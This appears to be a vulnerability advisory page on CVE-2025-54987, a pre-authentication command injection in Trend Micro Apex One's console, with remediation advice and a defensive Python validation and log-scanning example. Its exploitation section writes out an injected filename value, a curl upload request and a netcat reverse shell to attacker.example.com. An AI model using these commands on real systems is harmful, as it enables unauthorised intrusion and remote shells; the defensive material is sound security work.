Apex One: OS command injection in Trend Micro Apex One management console (CVE-2025-54987) #shorts
Summary
Today we’re discussing CVE-2025-54987, a critical unauthenticated command injection vulnerability in Trend Micro Apex One’s on-premise management console. Exploited in the wild, it allows attackers to upload malicious code and execute arbitrary commands without credentials. Trend Micro has released a temporary mitigation and plans a full patch in mid-August 2025.
Product details
The affected product is Trend Micro Apex One (on-premise), specifically version 2019 (14.0) builds earlier than 14.0.0.14039. Apex One provides endpoint security management for enterprise environments. This issue affects the management console component and is tracked separately from its sibling flaw because it applies to a different CPU architecture.
Vulnerability type summary
CVE-2025-54987 is classified under CWE-78: OS Command Injection. It allows attackers to inject arbitrary operating system commands into the application. Notably, this is a pre-authentication flaw, meaning no valid user credentials are required to trigger the vulnerability.
Details of the vulnerability
An attacker can send specially crafted requests to the Apex One management console, exploiting unvalidated input in its file upload or request handling routines. By crafting payloads that include shell commands, the attacker causes the console to execute them with system privileges. This vulnerability mirrors CVE-2025-54948 but is tracked separately because it applies to a different CPU architecture. Indicators of compromise include unexpected command executions, new files in the console's working directories, and abnormal network traffic. Trend Micro confirmed active exploitation, released a temporary mitigation tool, and advises administrators to apply it immediately.
Conclusion
Organizations using Trend Micro Apex One on-premise must deploy the temporary mitigation tool without delay and plan to upgrade to the patched version once Trend Micro’s mid-August 2025 update is available. In the meantime, monitor your management console logs for suspicious activity, restrict access to the console, and review firewall rules to limit inbound traffic to trusted sources.
Watch the full video on YouTube: CVE-2025-54987
Remediation and exploitation details
This chain involves the following actors:
- Attacker: Unauthenticated remote malicious actor (no credentials are needed, since the flaw is pre-authentication)
- Administrator: Defender and system operator
The following systems are involved:
- Trend Micro Apex One on-premise management console (Centralized security management): Receives and processes HTTP requests for file upload and command execution
Attack entry point
- HTTP file upload API: Unauthenticated endpoint in the management console that accepts user-supplied files
Remediation actions
- Apply Trend Micro's temporary mitigation tool immediately (see the Trend Micro advisory under Related Content)
- Upgrade to the patched version once Trend Micro's mid-August 2025 update is available (affected builds are those earlier than 14.0.0.14039)
- Restrict access to the management console and review firewall rules so that inbound traffic is limited to trusted sources
- Monitor management console logs for unexpected command executions, new files in the console's working directories, and abnormal network traffic
Exploitation actions
Port scan or web application enumeration
- Identify HTTP port and check /upload or /import paths with an automated scanner
OS command injection via file upload parameter
- Embed shell commands in file name or metadata, e.g. filename="report.txt;id;echo"
Custom HTTP POST with multipart/form-data
- curl -X POST "http://target:8200/upload" -F "file=@payload.txt"
Invoke the processing flow that concatenates user input into an OS command
- Access the console or wait for a scheduled task to process the uploaded file
Spawn a backdoor or interactive shell
- Execute: nc -e /bin/sh attacker.example.com 4444
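Added example, not Apex One's code nor anything from the page's source, with every identifier hypothetical: a defender's view of the file-name concatenation pattern the chain above describes. `vulnerable_command` shows the CWE-78 shape, `hardened_command` the allow-list plus argv form that keeps metacharacters out of any shell, and `flag_suspicious_uploads` runs the same check over constructed upload-log lines to surface the kind of indicator the summary mentions.

```python
import re
from pathlib import Path

# Shell metacharacters that have no place in an uploaded file name; the
# "report.txt;id;echo" pattern in the chain above depends on them.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r\\'\"]")
# Strict allow-list for the hardened handler: a plain basename, benign extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,100}")
ALLOWED_EXT = {".txt", ".csv", ".log"}

def is_suspicious_filename(name: str) -> bool:
    """Detection heuristic: flag names carrying shell metacharacters or traversal."""
    return bool(SHELL_META.search(name)) or "/" in name or ".." in name

def is_allowed_filename(name: str) -> bool:
    """Allow-list check: only plain names with an expected extension are accepted."""
    return (SAFE_NAME.fullmatch(name) is not None
            and ".." not in name
            and Path(name).suffix.lower() in ALLOWED_EXT)

def vulnerable_command(upload_dir: str, name: str) -> str:
    """CWE-78 shape (hypothetical): user input concatenated into one shell string."""
    return f"process-upload {upload_dir}/{name}"  # never hand this to a shell

def hardened_command(upload_dir: str, name: str) -> list[str]:
    """Hardened form: validate first, then build an argv list for subprocess.run
    without a shell, so metacharacters in the name are never interpreted."""
    if not is_allowed_filename(name):
        raise ValueError(f"rejected upload file name: {name!r}")
    return ["process-upload", str(Path(upload_dir) / name)]

# Constructed sample upload-log lines (not real Apex One logs).
SAMPLE_LOG = """\
2025-08-06T10:01:12Z POST /upload 200 filename="report.txt"
2025-08-06T10:01:40Z POST /upload 200 filename="report.txt;id;echo"
2025-08-06T10:02:05Z POST /upload 200 filename="q2 summary.txt"
"""

def flag_suspicious_uploads(log_text: str) -> list[str]:
    """Scan upload log lines and return file names that look like injection attempts."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'filename="([^"]*)"', line)
        if m and is_suspicious_filename(m.group(1)):
            hits.append(m.group(1))
    return hits
```

Note that the heuristic and the allow-list differ on purpose: "q2 summary.txt" is not flagged as an attack but is still rejected by the hardened handler, which accepts only what it expects rather than blocking what it recognises.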
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://success.trendmicro.com/en-US/solution/KA-0020652
- [2025-08-07] Trend Micro warns of actively exploited critical vulnerabilities in Apex One endpoint security product.
- [2025-08-06] Trend Micro warns of unauthenticated command injection vulnerabilities in Apex One being exploited in the wild, with a patch expected in mid-August 2025.
- [2025-08-06] Trend Micro releases a temporary mitigation tool for two exploited zero-day command injection vulnerabilities in Apex One.